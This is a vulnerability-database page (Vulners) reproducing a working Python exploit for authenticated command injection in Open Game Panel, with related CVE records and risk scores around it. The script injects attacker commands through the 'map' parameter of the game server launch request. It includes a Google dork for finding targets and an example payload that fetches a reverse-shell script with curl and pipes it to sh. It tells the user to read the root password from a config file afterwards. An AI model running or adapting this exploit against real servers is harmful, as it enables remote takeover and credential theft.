Vulners
Lucene search
Open Game Panel - Remote Code Execution (RCE) (Authenticated)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Open Game Panel - Remote Code Execution (Authenticated) Exploit | 4 Oct 202100:00 | – | zdt |
 | CVE-2021-37157 | 10 Nov 202102:35 | – | circl |
 | Open Game Panel 安全漏洞 | 10 Nov 202100:00 | – | cnnvd |
 | CVE-2021-37157 | 9 Nov 202123:12 | – | cve |
 | CVE-2021-37157 | 9 Nov 202123:12 | – | cvelist |
 | EUVD-2021-23731 | 7 Oct 202500:30 | – | euvd |
 | CVE-2021-37157 | 10 Nov 202100:15 | – | nvd |
 | Open Game Panel Remote Code Execution | 4 Oct 202100:00 | – | packetstorm |
 | Default credentials | 10 Nov 202100:15 | – | prion |
 | CVE-2021-37157 | 22 May 202520:03 | – | redhatcve |
10
# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intext:"Open Game Panel 2021"
# Date: 08/14/2021
# Exploit Author: prey
# Vendor Homepage: https://www.opengamepanel.org/
# Software Link: https://github.com/OpenGamePanel/OGP-Website
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
# Tested on: CentOS Linux 5.4.102
#Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command=
betwen ';', the user needs to be authenticated for this.
import requests
banner = """
@
@ @@& @@@@@/
@ @& #@@@@@& .=
,/%@#
@ @@@@@@@@@@@@@((%@@@@*
@ #@@@@@@@@@@@@@@@*%@,
@ @@@@@@@@@@@@@@&@@@@
@ &@@@@@@@@@/ &@@@.
@ @@@@@@@@@(
@ @@@@@@@@@@@@@&*
@ &@@@@@@@@@@@@@@@@%
@ ,&@@@@@@@@@@@@@
@ %@@@@@@@.
@ .%@@@@@@@@% @@@@@@
@ @@@@@# .&@@@@#
@ (@@@@@@@@@@@. .@@@& @@%
@ .@@@@@, #@@@@@* #@@@ @@@@@
@ @@@& &@@@. @@@
@ ,@@@ @@@@@@
@ @@@ %@@@,
@&@@ @@@,
@@@@
@@@@
*@@@@@# @@ *@@ %@ @@@ @@ @@@@@/ @@@ @@@ ,@@@ ,@( .@=
%
*@/ @@ .@/ @(@ @@ @@@( @@ ,@( @@@* @#@@ @@(@ ,@( .@=
%
*@@@@@@ @@ @ &&.@( @@ @.@@ @@@@ @@.@(@ @@ (@. @@ ,@( .@=
%
*@/ %@(@ @@@ @@ *@@@ @@ @@ @@. @@ @@@@@@, ,@( .@=
%
*@/ @@* @@@ @@ %@@ @@@@@* @@ @@ &@ @@ ,@@@@@ .@=
@@@@
##You can get mod_id and home_id on your game panel URL when you are logged
"""
print(banner)
target = input("Target url: (eg: https://panel.example.org)\n")
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
mod_id = input("Mod_id value: (eg: 2437)\n")
home_id = input("Home_id value: (eg: 3737)\n")
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")
url = target + "/home.php?m=gamemanager&p=game_monitor"
cookies = {"opengamepanel_web": opengamepanel_web}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}
try:
requests.post(url, headers=headers, cookies=cookies, data=data)
except:
print("Something went wrong, check your inputs or try manually exploiting the map parameter")
print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Oct 2021 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 3.18.8
CVSS 29
EPSS0.00263